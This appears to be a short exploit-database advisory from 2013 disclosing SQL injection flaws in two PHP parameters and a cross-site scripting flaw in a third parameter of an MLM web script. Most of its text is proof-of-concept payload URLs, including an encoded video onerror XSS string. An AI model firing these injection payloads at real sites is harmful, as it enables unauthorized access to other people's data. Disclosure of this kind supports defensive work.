id: 21014
date: 07/22/2013
title: MLM (Multi Level Marketing) Script - Multiple Vulnerabilities
author: 3spi0n
cves: 

[1] SQL Injection Vulnerabilities on Demo Site
 
[+] (productview.php, prdid Param)
>>> http://server/product/version2/productview.php?prdid='1
 
[+] (productview.php, uid param)
>>> http://server/product/version2/profileview.php?uid='1
 
[2] Xss (Cross Site Scripting) Vulnerability on Demo Site
 
[+] (regcheck_email.php, email param)
>>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E

#  0day.today [2023-03-26]  #